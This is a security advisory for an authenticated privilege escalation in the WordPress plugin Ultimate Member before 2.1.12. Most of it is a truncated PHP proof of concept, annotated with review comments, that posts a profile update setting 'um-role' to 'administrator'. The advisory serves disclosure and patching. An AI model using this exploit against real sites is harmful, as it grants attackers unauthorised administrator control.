
wpvulndb — Chloe Chamberland — WPVDB-ID: DD4C4ECE-7206-4788-8747-F0C0F3AB0A53
History: Nov 09, 2020 - 12:00 a.m.

Ultimate Member < 2.1.12 - Authenticated Privilege Escalation via Profile Update

2020-11-09 00:00:00
Chloe Chamberland
wpscan.com
7
ultimate member
privilege escalation
profile update
vulnerability
authentication
plugin

EPSS

0.009

Percentile

82.9%

Because Ultimate Member allowed the creation of new roles, the plugin also added a secondary Ultimate Member role field (`um-role` in the PoC below) to the /wp-admin profile update form, intended to let site administrators assign such roles to any user. In versions before 2.1.12 the plugin did not restrict who could submit that field: an authenticated user could update their own profile with `um-role` set to `administrator` and escalate their privileges, as the PoC below demonstrates. Fixed in 2.1.12.

PoC

// NOTE(review): this listing is truncated at its start as rendered here. The `<?php`
// opener, the configuration assignments ($wp_url, $wp_user, $wp_pass, $cookiejar,
// $name, $lastname, $nickname, $email), and the beginning of the login request (its
// URL and the username field whose value is $wp_user) are missing. Do not run as-is.
// NOTE(review): the quotes below are typographic (‘ ’ “ ”) from the page rendering and
// must be restored to ASCII quotes before this is valid PHP or the regexes match.
// NOTE(review): the three `//` comments inside the code were line comments in the
// original; collapsed onto one line they would comment out everything after them.
// Flow as visible: (1) a login POST (pwd / rememberme / wp-submit fields) whose session
// cookie is kept in $cookiejar; (2) GET /wp-admin/profile.php and scrape _wpnonce;
// (3) GET the same URL again and scrape checkuser_id — both values come from the same
// page, so one request would do; (4) POST the profile update with the plugin's
// `um-role` field set to 'administrator'. Per the advisory title, affected versions
// accepted this value from any authenticated user, which is the privilege escalation.
// Observations: both preg_match() results are used via $matches[1] without checking the
// return value, so a failed match yields an undefined-offset warning and an empty
// nonce/user_id; the scraped field is named checkuser_id but is posted as
// check_userid — presumably only user_id matters server-side, verify against WordPress.
$wp_user, ‘pwd’ => $wp_pass, ‘rememberme’ => ‘forever’, ‘wp-submit’ => ‘Log+In’, ]); $output = curl_exec($ch); curl_close($ch); // Pull the Nonce $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $wp_url . ‘/wp-admin/profile.php’); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $content = curl_exec($ch); curl_close($ch); preg_match(‘/_wpnonce"\svalue=“([^”]+)"/’, $content, $matches); $nonce = $matches[1]; // Pull the user_id $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $wp_url . ‘/wp-admin/profile.php’); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $content = curl_exec($ch); curl_close($ch); preg_match(‘/“checkuser_id”\svalue=“([^”]+)"/’, $content, $matches); $user_id = $matches[1]; // Update Settings $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $wp_url . ‘/wp-admin/profile.php’); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, [ ‘_wpnonce’ => $nonce, ‘_wp_http_referer’ => ‘%2Fwp-admin%2Fprofile.php’, ‘from’ => ‘profile’, ‘check_userid’ => $user_id, ‘admin_bar_front’ => ‘1’, ‘first_name’ => $name, ‘last_name’ => $lastname, ‘nickname’ => $nickname, ‘email’ => $email, ‘url’ => ‘’, ‘description’ => ‘’, ‘pass1’ => ‘’, ‘pass2’ => ‘’, ‘um-role’ => ‘administrator’, ‘action’ => ‘update’, ‘user_id’ => $user_id, ‘submit’ => ‘Update+Profile’ ]); $output = curl_exec($ch); curl_close($ch); print_r($output); ?>

